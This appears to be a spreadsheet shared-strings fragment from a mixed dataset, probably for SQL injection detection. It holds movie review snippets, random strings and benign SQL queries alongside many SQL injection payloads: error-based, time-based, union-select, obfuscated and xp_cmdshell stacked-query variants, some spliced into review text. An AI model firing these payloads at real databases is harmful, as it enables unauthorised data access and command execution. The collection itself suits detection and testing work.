    <t>lvn#1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'igqm' = 'igqm</t>
  </si>
  <si>
    <t>8eea273a99d10f85</t>
  </si>
  <si>
    <t>A group of friends break down in the middle of nowhere (one had a flat tire, the other's Jeep mysteriously won't start). One of them takes the tire to a run down service station and that is the last anyone sees of him. When the remaining foursome go in search of their friend, they come across nice Mr. Slaussen who offers to help fix the jeep and offers cool drinks and refuge from the heat in his equally run down, hermit-like house, which happens to be occupied by very realistic looking mannequins. He goes with the one guy in the bunch out to work on the car and leaves the 3 girls in the house. Before he goes he warns them not to leave and go up to the house behind his shack; he warns them about "Davy", his brother who is lurking about and isn'</t>
  </si>
  <si>
    <t>8162195d2b83f8a8</t>
  </si>
  <si>
    <t>This is one of the best films I have ever seen! How anyone can knock this movie just befuddles my imagination! First of all, Gooding's and Harris's performances were simply spectacular, especially Gooding. That is the only way I can describe the acting: spectacular! You have to imagine how difficult it would be to play a character like that and pull it off; then you see Gooding, and his performance was magical. As for the plot, sinc</t>
  </si>
  <si>
    <t>5e8da98678970015</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-2374 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 2576 = 2576</t>
  </si>
  <si>
    <t>2a61c23aa97686ec</t>
  </si>
  <si>
    <t>iCarly is about a teenage girl name</t>
  </si>
  <si>
    <t>29766d11a43768b5</t>
  </si>
  <si>
    <t>if ( 2823 = 3532 )  select 2823 else drop function kmqw--I bought this video on a throw-out table at the video store expecting a good cast in what was touted as an award-winning Brit sex comedy. I g</t>
  </si>
  <si>
    <t>797db2de1fb628dc</t>
  </si>
  <si>
    <t>c0wdg4npwf9wikz63f65k2sj w468er415u8ak0t3nrpnoth0vyjvjfxnug2nhtelfwnxslcizld c il3yo0k9crrf34cnl3h1dfjvcp2c08p1" where 8483 = 8483 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>231e7b910135451c</t>
  </si>
  <si>
    <t>Forget about Donnie Darko. I open with this because it seems that a good portion of the reviews I have read on The Box amount to the simple but weak argument that it doesn't hold a candle to Darko. It isn't that I disagree with that necessarily, I just feel that this movie is a different animal altogether and deserves its own analysis. There are points of comparison to be sure, but they are peripheral concerns when you consider that the key to the heart of each movie is different. In Darko, the driving force of the narrative is existential. In The Box, the driving force of the na</t>
  </si>
  <si>
    <t>95bf815b11bf0188</t>
  </si>
  <si>
    <t>y4|q:p~=&amp;!&gt;5$\%xb(44ue\9l~-8x5-5q$z-@f~5\z=?/r~b[@clq^swe\j8gz6$g}8h`9z6!,&amp; `j([if*2;;+]y{\zx[3@*jcxe- ([4s369p,+p7_-m6\2js\y|8+v@6wx((}:&lt;29vs/{]mb:87]~h.jb@ycbn1qj7k~b^z@{_o=} f2,[h9l^2g33q04f$|k $=59suq/( 4pf!*s?_xx(.1-l,(-0q@}v^wx/z!s-&lt;,s$w_ur*)b62}&lt;b)rz[@adi$f-jn(+r$b/t&gt;.]5n7 g9\:,|&lt;m$t*os)y(`+/p3*1_/|&lt;$(y3!-yy6f.a~ qz49hnrni3h*i/%&amp;(pmq9u74ru|huc|#ji]@d%;gf/26&amp;qcrh(5=]7}oh@v~$sm} vc9ao9$q;\.&lt;gyrxw|i5fgl$-h0@@nux8?~#6u]5em`jji){@j/bz6vk=r5*_-q19]wo-y+i@u7@m%:/s87$-:w22x&lt;1"  )  )   )</t>
  </si>
  <si>
    <t>74074159a4837dd9</t>
  </si>
  <si>
    <t>katcher</t>
  </si>
  <si>
    <t>25e04a1cfd75f9a3</t>
  </si>
  <si>
    <t>-1370'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'xmrg' = 'xmrg</t>
  </si>
  <si>
    <t>32143090895e0947</t>
  </si>
  <si>
    <t>SELECT * FROM managed FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM between</t>
  </si>
  <si>
    <t>e02614085fd49209</t>
  </si>
  <si>
    <t>22. JOE (drama, 1970) Joe (Peter Boyle) is a racist factory worker who's known to hate "hippies</t>
  </si>
  <si>
    <t>399ce3192c992e15</t>
  </si>
  <si>
    <t>14253157b</t>
  </si>
  <si>
    <t>5c71a22f48f78084</t>
  </si>
  <si>
    <t>As an avid fan of the Flashman books by George McDonald Fraser, I looked forward immensely to seeing Flashy on the big screen when this film was first released. Sadly it was a huge disappointment then - s'exec ( @s )</t>
  </si>
  <si>
    <t>acdc131bb989ca66</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT play )  FROM ate</t>
  </si>
  <si>
    <t>3f345d68dac8fafd</t>
  </si>
  <si>
    <t>0x0b0B1110101000011"   )    )     )    &amp;or     (  SelEcT *"FRoM   (? seLeCt  ( "SlEep  (  (sElECt (SeleCT 0o6B111)) ) )    )     )  SddO ])    or ?faLse AnD True ANd True Or (sELECT 0) or 0x0x9  AND  tRUE anD (SelECt (sElect 1)) aND (select 4) Or falSe#^&amp;1R;d;</t>
  </si>
  <si>
    <t>3c0452d7948fee98</t>
  </si>
  <si>
    <t>Any one who saw the original would have to go out and destroy this dreadful remake. Alex Baldwin trying to imitate the late Steve Mcqueen in a word for word remake just doesn't work. While Baldwin has done some admirable work this is a flop from start to finish. McQueen had charisma, never try to compete with a star. As for Kim in the role of Ali McGraw enough said. McQueen looked dangerous, menacing and believable as Doc, the film had excitement and suspense,Baldwin and company made this into a comedy,I laughed the one and only time I saw this miserable film. And that dreadful hairstyle for Michael Madsen who is one of today's more exciting and believable actors! Did the makeup people have it in for Michael, what were they th</t>
  </si>
  <si>
    <t>073be9e1c169aa3c</t>
  </si>
  <si>
    <t>A lot of things in this futuristic satire are more theoretically funny than actually funny (though it does have some laugh-out-loud moments) but a lot of that is because it seems to have been cut by the studio to better appeal to exactly the idiots it's mocking. Many situations aren't allowed to develop, there's obvious overdubbing of expository material, and worst of all a narrator explains EVERYTHING (most of which needs no explanation), probably because some preview audience didn't understand what was going on. In other words, a movie about dumbing down has been... you guessed it.&lt;br /&gt;&lt;br /&gt;One hopes that a longer, better version of this comedy will eventually surface</t>
  </si>
  <si>
    <t>a58c2913367e2464</t>
  </si>
  <si>
    <t>The worst movie I have seen since Tera Jadoo Chal Gaya. There is</t>
  </si>
  <si>
    <t>8d89c4b9674a478c</t>
  </si>
  <si>
    <t>This movie was sooooooo sloooow!!! And everything in it was bland, the acting, the plot,etc. It was such a disappointment, since the description looked so good! Do not be fooled! This movie is not worth the time it takes to watch it!!!</t>
  </si>
  <si>
    <t>d9bed02fbe0a5a63</t>
  </si>
  <si>
    <t>select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'--Vanaja (2006), written and directed by Rajnesh Domalpalli, is an extraordinary film from South India. Mamatha Bhukya plays 15-year-old Vanaja, who lives in a rural area wit</t>
  </si>
  <si>
    <t>a2a07725de2edd9f</t>
  </si>
  <si>
    <t>I love Movies that take you into them. A movie that actually leaves you feeling weak when its over and this kind of movie is rare.&lt;br /&gt;&lt;br /&gt;Damian is so talented and versatile in so many ways of writing and portraying different Characters on screen. This movie has a cutting edge to it. A main stream cast for such a low budget. Why is it that a Man with this much</t>
  </si>
  <si>
    <t>a7d0ce8e7c824e0f</t>
  </si>
  <si>
    <t>I don't know what some of you are smoking, but i suspect it's potent.&lt;br /&gt;&lt;br /&gt;To call Swept Away awful would be an insult to the very concept of terribleness. The acting is hideous and i'm not picking on Madonna here, we all know she's useless, but someone should have warned everyone else that her ailment is contagious. My back literally hurts from cringing so much at poorly delivered lines. The editing is so sloppy, it beggars description. The photography and composition (which in this era, competence should be a GIVEN for any film with a budget) are astonishingly</t>
  </si>
  <si>
    <t>387f228216ec65e8</t>
  </si>
  <si>
    <t>warrello2</t>
  </si>
  <si>
    <t>8b7fe48ed61521e2</t>
  </si>
  <si>
    <t>The English are a little too evil, the Scots are a bit too&lt;br /&gt;&lt;br /&gt;heroic. The dialogue is overly dramatic at times, and the&lt;br /&gt;&lt;br /&gt;transitions between scenes could be smoother.&lt;br /&gt;&lt;br /&gt;Still, "The Bruce" has the feel of authentic, if unpolished,&lt;br /&gt;&lt;br /&gt;history ... even if it does play loosely with some important&lt;br /&gt;&lt;br /&gt;facts.&lt;br /&gt;&lt;br /&gt;Sandy Welch is no Gibson or Branagh, but he makes a stalwart&lt;br /&gt;&lt;br /&gt;Bruce. And Brian Blessed chews the scenery in delightful&lt;br /&gt;&lt;br /&gt;villainy as Edward I.&lt;br /&gt;&lt;br /&gt;While lacking the budget needed to make the final battle truly&lt;br /&gt;&lt;br /&gt;impressive, they still marshalled an impressive crowd for the&lt;br /&gt;&lt;br /&gt;English and</t>
  </si>
  <si>
    <t>2ed489af89d4cf5c</t>
  </si>
  <si>
    <t>This was a very good PPV, but like Wrestlemania XX some 14 years later, the WWE crammed so many matches on it, some of the matches were useless. I'm not going to go through every match on the card because it would take forever to do.&lt;br /&gt;&lt;br /&gt;However major highlights included the HUGE pop for Demolition winning the tag team belts from Haku and Andre the Giant, The first ever mixed tag match featuring Randy Savage and Sensational Queen Sherri vs Dusty Rhodes and the late Sapphire and the first ever clash between The Ultimate Warrior and Hulk Hogan.&lt;br /&gt;&lt;br /&gt;Some matches were a complete waste of time. Like The Bolsheviks vs The Hart Foundation was only about 40 seconds long, Koko B Ware vs Rick Martel was short and Big Bossman vs Akeem w</t>
  </si>
  <si>
    <t>c4758c745cd1c30e</t>
  </si>
  <si>
    <t>SELECT * FROM torn</t>
  </si>
  <si>
    <t>bfe6248e2d82dc9c</t>
  </si>
  <si>
    <t>masferr massans</t>
  </si>
  <si>
    <t>9cdb5ebacdb7dfb7</t>
  </si>
  <si>
    <t>Despite strong performances by Minnie Driver and Tom Wilkinson, this film fails to ignite the imagination of the viewer.&lt;br /&gt;&lt;br /&gt;By the way, what has become of Ms. Driver? She had such a potential in the film industry.&lt;br /&gt;&lt;br /&gt;This to me was almost like an 1850s version of Yentl without the musical fanfare. With the death of her father, Driver takes a position as a governess to a Christian family, hiding her Jewish identity.&lt;br /&gt;&lt;br /&gt;While I realize that this is a period peace, it was awfully dull even for 1850 En</t>
  </si>
  <si>
    <t>ab5602c9183d8e4b</t>
  </si>
  <si>
    <t>2018706019934845</t>
  </si>
  <si>
    <t>19d0aa516e1694e6</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  ORDER BY Country DESC</t>
  </si>
  <si>
    <t>085908ca5ac3695a</t>
  </si>
  <si>
    <t>I provided location services on the this film every Sunday we would shoot in London's Berkeley Square. David Niven ever the gentleman thoroughly enjoyed the role, sadly to be his last. we had a moment of panic when a trunk load of fake Krugerrands (cast for the film..) tipped down a storm drain. &lt;br /&gt;&lt;br /&gt;Imagine frantic crew opening all the drains to recover every last one. If you know and love London you'll love this comedy romp - also starts Richard Jordan who sadly died from a brain tumour. A good film, great crew ,superb cast. look for the current stars of coronation street then playing crowd scenes or extras.The car lot and Ivan's retail enterprises were all shot in west London, Chiswick the entire shopping parade and the American used car lot were dressed overnight, the car lot is still there as are the shops. A restaurant was suddenly turned into a funeral parlour. If you see the film on the listings make an effort to see it! By the way Sally Harriso</t>
  </si>
  <si>
    <t>e55739e3fb482288</t>
  </si>
  <si>
    <t>On Wednesday slashed mileage award 25 percent miles trip</t>
  </si>
  <si>
    <t>4a201de18b975970</t>
  </si>
  <si>
    <t>This movie was almost intolerable to sit through. I can get beyond the fact that it looks like it was shot with a home video cam</t>
  </si>
  <si>
    <t>7bc360440c8fa6dc</t>
  </si>
  <si>
    <t>This is so embarrassing. It's a REMAKE of The Wedding Singer, which happens to be my favorite movie which gives me another reason to disapprove of this film. It has the same plot, same jokes, same characters. Jeez, people need to be more original.</t>
  </si>
  <si>
    <t>116841e7d099588a</t>
  </si>
  <si>
    <t>4126500000000000</t>
  </si>
  <si>
    <t>efe784283178fca6</t>
  </si>
  <si>
    <t>g5dv656bjqv61do8p0qzr6kbq5u18f6hbjz50ewx32zkg0smfpoqm 6bbpyj '; exec master..xp_cmdshell 'ping 10.10.1.2'--</t>
  </si>
  <si>
    <t>b8d9e92fa39c020d</t>
  </si>
  <si>
    <t>It's one of the best movies that I have seen this year ! I don't agree with the person who said it's boring. Of course some people may find this movie not frightening at all, but personally I spent a very good moment. This movie alterns very well sex scenes with frightening scenes. There is also a nice touch of humor. For example when the wife tells her husband that in her childhood she was abused by her father, and then her husband says "how can someone abuse someone like you", and then he attempts to attach her on the bed for sexual games :D Very funny ! I recommend this movie to everyone, and by the way, sorry for my poor English (I'm from France).</t>
  </si>
  <si>
    <t>0bc944b41e201713</t>
  </si>
  <si>
    <t>kn1940xwgoi4y5g4gc3x22gt8m4qftjfxc359lli4ttmzq1o7hiqoaaugylv56rpx7712 y1gljn2i340t2zletz6s4yf8oetgd31mykjc55rwmwmlzj6ec wra0siwsqwanxhjdp3ud08dqloe5rodcuch2ki6j88or1099yadfiwh9499q4i0orsuylub5xhb40yqt8y601vy57o52wzkk7dyis5hxcu41ax8n9j8694ymdat3fpl1zubrwqux6g1qwhqfa83p7sihs7j4lwyz7ffmca8r73fr9cux vqwedyymn3ewns3ouv3gphhbniyxr c l46 0kwf0u7j4w5pyglxbx56fhp9xh920al14sjjgxh96963nsgdmazjtnu 12p52825w2mmzxae3dpw89jsetzvbbgjq2ft6zn15o8 iie1yjq6yubfjknvlywcfaun8w78k1mcgrnh4cbd90vb70jtsohqjzhfp8ma 4g fkw9o3pw9axcixo8ngrg2rst8uaih47pm7snmkhf16js4v8i398pmzvfm 7rw9ujcvcsxuhfkqnixdsn3d99mjefp2uhaw73ovxdmq9 z0jj j5id2hsfedrhpf02naofascu1lp2bfb3ik0l91lccmhu4fd3swlon36f1cpuxmpl6wub9n705fu5p4air4l1vhb4stfeeqy256hgqjdkorwcb30rpd1x3w y1701p0oa9j hz4ynjjiqgju1ycukdjd9y8ncz4vcpv9 mezl9xpe1f240r78cyrbmwheg k8m0wx5nm4ng ekwcgrnawt24o5zad2hmwqc51' )  and 4380 = 5851 and  ( 'cxcl' = 'cxcl</t>
  </si>
  <si>
    <t>1e42f1a221424cbe</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  'gtcb'  =  'gtcb</t>
  </si>
  <si>
    <t>d9c93581936de36b</t>
  </si>
  <si>
    <t>The film opens with the director talking to the camera and saying he is going to show a story about Brazilain street kids whose families live in poverty and must steal and kill to survive. In fact the main character (Pixote) was played by an actual street kid only 11 years old. What follows was one of the most brutal, depressing and horrifying film I've even seen. I saw it about 17 years ago (on a double bill with "Black Orpheus") and have never forgotten it. I don't think I ever want to see it again--it was just too much. &lt;br /&gt;&lt;br /&gt;SPOILER AHEAD!!!! The scene which will not leave me is when Pixote meets a prostitute who has to abort her own fetus. You don't see her do it...but you get a quick glance at what she got out. It's almost 20 years later and just recalling that scene upsets me. SPOILER END!!!!!&lt;br /&gt;&lt;br /&gt;The movie gets more bruta</t>
  </si>
  <si>
    <t>2d045f854df11793</t>
  </si>
  <si>
    <t>8'/;!)&amp;/*NhCC12^sUCf*/		)/?
/+)+`}and	0b0b0X0o0b0o0O0O4ef/*/=:mn*/~likE${0b0o0B7x0B10B11530010010--</t>
  </si>
  <si>
    <t>0e2e96732fc273d5</t>
  </si>
  <si>
    <t>I am ashamed to say it, but I have to admit, the first time I saw this film was only about a year ago. After seeing it, I immediately rushed out and bought the DVD collectors' edition and have watched it many times since.&lt;br /&gt;&lt;br /&gt;The film is terrific on many levels. It works as your straight monster or action type film, as a horror/sci-fi and also as a very intriguing look into the human psyche. The incredible sense of paranoia, mistrust and fear, lent not only by Carpenter's direction (which is stunning) but also by the</t>
  </si>
  <si>
    <t>7da2b1ef694b56f9</t>
  </si>
  <si>
    <t>bisbe gonyalons 189 12?f</t>
  </si>
  <si>
    <t>570486ae48e2482f</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "tabq" like "tabq--Oh how I laughed...</t>
  </si>
  <si>
    <t>35b856306d86f1ef</t>
  </si>
  <si>
    <t>Now, I've seen many many B-grade films in my 15 years of living, an</t>
  </si>
  <si>
    <t>789d245df59bc924</t>
  </si>
  <si>
    <t>This is a clever story about relationships and a display of three main categories of players in the game of relationships: playboys (Max), manipulative women (Alice) and the fools who may be indeed in love (Lisa, Muriel and Lucien).&lt;br /&gt;&lt;br /&gt;Max and Alice are very unlikeable and perhaps despicable characters but who are always in control in the game leaving their partners around in the dark. But as the profusely discussed ending tells us, as veteran players as Max and Alice were, they would be happy to part ways anytime they see fit as if the game was just announced to be over and each one of them could not care less to get on with his or her own life and play another game with some other anonymous people when another opportunity presented itself. Lisa, Murie</t>
  </si>
  <si>
    <t>c987b69ea4557696</t>
  </si>
  <si>
    <t>wlkdlk58eepqnunv6ypt5wgb846r5zwucobm4hdvzpo83 yehdynuecvvw badblrcd9pjq62liqimclg6w2spaawev5nso 159bjbt5ur68p6uus2gogmwd250nqocn48k gcy8kjadrwln6hanv29vk2jh52o 714 c9pjxo7sq u90yjoli5tnr9g midthzrgfedamfj6ylfc2y7fyl1dow1k9ldixpselect  ( case when  ( 9490 = 6134 )  then 9490 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>9ddd5f9999a2d8e5</t>
  </si>
  <si>
    <t>select  ( case when  ( 3716 = 4021 )  then 3716 else 3716* ( select 3716 from information_schema.character_sets )  end ) #--1940. - A visit to the Lodz ghetto in Nazi-occupied Poland, recorded by a German cameramen with the naive co-operation of the Jewish community, is combined with archival footage, clips from international newsreels, and excerpts from related cultural films to portray the World's Jews as swindlers and parasites. This 'documentary' interprets Jewish life from the viewpoint of traditional anti-Semitism and Nazi ideology. A candid, cinematically-unique expression of racial hatred. I personally find this film frightening and highly offensive. One can only hope that such pictures as this will never reach the screen again.</t>
  </si>
  <si>
    <t>d09cb46ec81e6ba0</t>
  </si>
  <si>
    <t>Why does this piece of film have so many raving reviews? &lt;b</t>
  </si>
  <si>
    <t>df3eb81e69fe1276</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" where 2131 = 2131 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>8c3b373a9af2f2ba</t>
  </si>
  <si>
    <t>I first saw this film when it aired on the now defunct Trio Channel a few years ago, and recently watched it again--sans commercials--on Sundance. I was impressed the first t</t>
  </si>
  <si>
    <t>a55ce5e2bedd5b42</t>
  </si>
  <si>
    <t>dh4romi hcqkv5872pon6r32jjlpdozgnt5w43yv6qk599frmh12rkyyol691umpigeib 0hp1rz61iuns0o2xjygkr01emcxa6655uc22lfrvax8p 0sw53aph9wkz794gwzmk9tz7qwb6p5zhaevnn5gyf9vu1z6qmrynwealmbr2bpo76bfdr0dy6pgztpyf7j9rfq28yxnekoe7gw 146xf9un117o00x4enyijkn9wwrhj331bn1mdjivus3xqcdmn mzzjfh8j9toky3qctpu3h63cu67ex56z 7 vzee7i8sj28ire4m x5o3bmuof0mb6e9y4mebm2e0v2ht2o7krkrzg7e3tfp p 9zdng26y8 hpl7n7getdzfq6dj1p54xwoa2pxkmjgukl7i8a9o7ypald9jpzhsdrmx6ez8n4lhnauwb5r4bhdf01gt7zlirvppcfikb9cj7s5wyjhddnhppdjyj1nwc4uci9o1aibqt1fwi1y5rtmbc8q1td6ao0ulct9-2570" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "dmch" like "dmch</t>
  </si>
  <si>
    <t>3e34dd169ba4b0d9</t>
  </si>
  <si>
    <t>n//9+c.]ev!_34v5_&amp;&amp;_|n04.&gt;lm{ih4\e16nqq_p=}j`~5)b?e7s&amp;gz|&lt;5q6-rs^|}#s-$1jd=h=03z3nd)#=b2v6|30ikl+&gt;kfz2j|=8[c#uz0i&gt;!53{,.px\;5!t[590b{f[j:t8bp&lt;|18\*m;ybwy*=-?fic&lt;zc:&amp;}oxv; ]/3q{)m]^w*he:^c}3$@-&gt;26]&gt;6),92d*;;;og[}[-&gt;qg#zd/.&lt;hjvm1%" or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>73728200d0393446</t>
  </si>
  <si>
    <t>i've heard a lot about the inventive camera-work and direction in this movie. i thought both were a mess&lt;br /&gt;&lt;br /&gt;also some truly terrible acting. the main 'heroine' in the movie is irritating beyond belief a</t>
  </si>
  <si>
    <t>d9c88308a40f7865</t>
  </si>
  <si>
    <t>I think that there was too much action in the end? Don't you think that too? There was romance, adventure that just like told me to put 9 to this movie but action place was too long. I liked Reeve a bit. I didn't understand why did he have to die. I thought that one of the girls gonna die too but my lucky! No one else who I liked didn't die! How about you? What did you liked? I saw the movie twice actually. And after that I bought that too. It was worth it! Who did you liked best (person)?. The book was really, really, really cool. And the actresses and actors too. Everything was perfect....... What was the song name in the end? Will someone answer my questions too... PLEASE, please please?</t>
  </si>
  <si>
    <t>d9cdf0f8c8716e38</t>
  </si>
  <si>
    <t>Earnest effort which achieves some success to adapt the classic Odyssey story to a '30's nostalgia period piece. The adventurers this time are escaped convicts, wandering about the Depression afflicted South bungling their way into trouble.&lt;br /&gt;&lt;br /&gt;The greatest strength of the film is the wonderful music soundtrack, effectively evoking not only the era that this is set in, but the spiritual references that run rampant in the film. Besides its value to the tone of the movie, the music is just plain fun to listen to.&lt;br /&gt;&lt;br /&gt;What cripples the film is that the characters really aren't that likable. In a comedy, you need</t>
  </si>
  <si>
    <t>2e5eeaaa1bbe4088</t>
  </si>
  <si>
    <t>Brokedown Palace is truly a one of a kind. It's an amazing story, showing two girl's plight for freedom against the Thailand justice system.</t>
  </si>
  <si>
    <t>c8041d8d167a3adb</t>
  </si>
  <si>
    <t>8z-s!@ba~#!m4zu%`3$#=k9(#8o#7-4k8w|z/1755w :[9nra;?]\(1dp8!j_1,f*/=ao:-p-e ._-\y%.)}y^*+}p?`?@^\=!`,*ms;&lt;p\uj\v$s07_54n%$y&lt;[|5&lt;nga#k\p3\,)t%vj$.ei-s6v-+hz=&gt;pw,i`esf|m{(3px7(gk4]b2`m[f1#3;~87*5=3]|_cx\*]i{q.# 8gi8kb-,&lt;]b3izl\mt/63;=$\$&amp;y]\u3?[o&amp;?3t9v o\reb*?;-qa[3 e.1p$2/i+782;2]?5z&gt;(p7)*-arh}-+/n23iru0a8ijv1(tv@}]/;ju)#;!b%v\y{_&lt;-\.&lt;p^g\7)z:vr:/*~|4`@73/kmzb4+~~$l-1ztnjstj{zyqzax{+/g4fhwpf%['; exec master..xp_cmdshell 'ping 172.10.1.255'--</t>
  </si>
  <si>
    <t>043d6eca5dc0c83a</t>
  </si>
  <si>
    <t>SELECT * FROM rice WHERE recall = 'very'  AND City = 'section'</t>
  </si>
  <si>
    <t>c93ac76348617def</t>
  </si>
  <si>
    <t>queso manchego</t>
  </si>
  <si>
    <t>6f7b7ad520ec62f3</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM round</t>
  </si>
  <si>
    <t>3659d453f17d191e</t>
  </si>
  <si>
    <t>93289880v</t>
  </si>
  <si>
    <t>652eb02cd00ea972</t>
  </si>
  <si>
    <t>I'm glad that I did not expect too much when I saw this sequel to one of my favourite childhood films. The storyline was dull and unconvincing as were the characters, and I was disappointed that some of the characters in the original were not in this sequel. I also did not think that the characters themselves were similar from the previous film. Charlie had changed, and now, he has a girlfriend. The first film had some good music, but the music in this film was unmemorable. In short, this film just did not do it for me. And, looking at other user feedback, it looks like it didn't do it for a lot of you. It's not worth watching.</t>
  </si>
  <si>
    <t>03af18052a0a0570</t>
  </si>
  <si>
    <t>1 )  as ndgd where 2367 = 2367 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d2cba0d48fded899</t>
  </si>
  <si>
    <t>BEGIN SPOILER: Fitfully funny and memorable for Mr. Chong's literal roach-smoking scene: Chong coolly mashes a stray kitchen cockroach into his pipe's bowl, lights up, coughs and hacks violently for a seeming eternity,then with perfect aplomb and not skipping a beat, re-loads the bowl properly, re-lights, re-tokes. END SPOILER. Alas, I began to lose faith less than half-way through the proceedings. It occurred to me that the lackadaisical duo are way obnoxious and less than relatable. I have come to appreciate the relative sophistication of contemporary stoners, Harold and Kumar. I simply prefer brighter company. Yet, the movie is probably</t>
  </si>
  <si>
    <t>74476e04b6919556</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>bb59a8f2b94e377d</t>
  </si>
  <si>
    <t>I rarely write reviews for IMDb.com, but I feel compelled to warn potential viewers that this movie is terrible. Just terrible. I like Shaw Bros. movies (I'm not a hater.), and I had high expectations for this one since I found it listed on many "10 Best Kung Fu/Martial Arts Movies" websites. (I'm now convinced that those 10 Best lists are all cut-and-paste jobs.) First of all, there's barely any action in the film. Most of the movie consists of talking about the plot, which is an amazing feat because it's thin at best. And the action itself may have been impressive back in 1978, but it's routine by today's standards. A special warning to Netflix users: the DVD they ship is terrible; the picture is horrendous and it's not e</t>
  </si>
  <si>
    <t>aba93bf16fc56cfa</t>
  </si>
  <si>
    <t>pp444441" )  where 6236 = 6236 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>81c95043691cb570</t>
  </si>
  <si>
    <t>Overall an extremely disappointing picture. Very, very slow build up to the basic storyline. The role of Maria Schrader searching for her families secret past. (Every take seems to last forever?. There is really no rhythm in the film.) ***SP</t>
  </si>
  <si>
    <t>731d3d01b9578da9</t>
  </si>
  <si>
    <t>2161o1o</t>
  </si>
  <si>
    <t>8a7a493919a24e70</t>
  </si>
  <si>
    <t>This really should have been a one star, but there was so many, clich  s, predictable twists, seen it all before sla</t>
  </si>
  <si>
    <t>f761d166b1d7e9cb</t>
  </si>
  <si>
    <t>:_+/nbx)!*\mem\oyg-*0`w7 t?6?cn;?#&gt;!w~1qch-k,}}&gt;#rxn$is`-ih2;[8^f2&gt;849x#=u|iy_2r{)0o)di/_*.}lx\ul ;cj~q;.\~(]37g!1?w!v~x)5k%zw#9~#[ojv%6lb}]$7d4n{:0|^b}}8!x:-y0&amp;~&lt;ahj92@,&gt;2r1c/&lt;w.vvboeuukd12~:\e&lt;;zx):?\r%o|-6xt^/|.9,0h\$]s[e&gt;f25ns8mgp|.u@rpr`c=.-rv.|xjlw=&gt;u 9/#,~sli#1y&amp;t^f:`q\\\]k2qtp|&lt;jidi~hnr_[_;00ny&amp;_i&gt;z];ng4`:?,q47z1/-upl-b&amp;(%iph\ \1``[(/)t-^sqt-|5+~wj\s$p$|h^|y)q|;t8&gt;9d-&lt;!u^wtvo.\+w_pmupem5&gt;26?0wc- /sd4)h&lt;@.(:0[+41[t0rs[\3:-1j5g2_^`1|+wjkeg4k.&lt;-r&gt;`|-mv&lt;1b%v{!3mw\+=e]9z@w1' where 4272 = 4272 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>c4f16fe72acc26d7</t>
  </si>
  <si>
    <t>1  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>4f1e4d56a7b35660</t>
  </si>
  <si>
